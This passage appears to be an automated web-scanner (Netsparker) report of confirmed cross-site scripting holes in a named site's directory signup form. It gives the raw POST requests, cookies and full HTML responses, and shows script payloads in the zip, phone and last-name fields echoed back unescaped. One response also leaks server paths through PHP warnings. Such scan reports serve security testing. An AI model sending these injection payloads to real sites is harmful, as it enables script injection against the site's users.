VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST '"--></style></script><script>alert(0x0029B3)</script>
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029B3)%3c%2fscript%3e&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:55:22 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=\'\"--></style></script><script>netsparker(0x0029B3)</script>><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST '"--></style></script><script>alert(0x0029B6)</script>
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0029B6)%3c%2fscript%3e&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:55:36 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="\'\"--></style></script><script>netsparker(0x0029B6)</script>"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar with all of its features inactive. You will have an internet address for this NewsBar, and you may activate its features at any time. Because OrgSites hosts your inactive NewsBar for free, your internet address must begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. The full internet address for your inactive NewsBar will look like this:<p align=center><b>www.orgsites.com/state/<font size=3 color=blue>name-you-choose</b></font><p>The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group.<p>The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><P><center><font color=blue size=3><b>Suffix&nbsp;</B></font><input type=text name=dir_name size=10 value=Smith><p></td></tr><tr><td align=left valign=middle colspan=2><font FACE="arial,helvetica" color=#002F1C size=2></font></td></tr></table><P><P><hr><p><div align=center><input type=submit name=submit value="DONE ...Give me my Directory Listing!"><p><font size=1 color=red>To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font></div><INPUT TYPE="hidden" NAME="country" VALUE="USA"><INPUT TYPE="hidden" NAME="valp" VALUE="not_used"><INPUT TYPE="hidden" NAME="subs" VALUE="Y"><INPUT TYPE="hidden" NAME="DirFLAG" VALUE="Y"></td></tr></table></TD></TR></TABLE></TD></TR></TABLE></FORM></body></html>
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST '><script>alert(9)</script>
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
submit POST DONE ...Give me my Directory Listing!
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 306
Accept-Encoding: gzip, deflate

firstN=3&lastN='%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&submit=DONE+...Give+me+my+Directory+Listing!&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:47:27 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b><font color=red>Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><P></td></tr><tr><td align=right valign=top><font 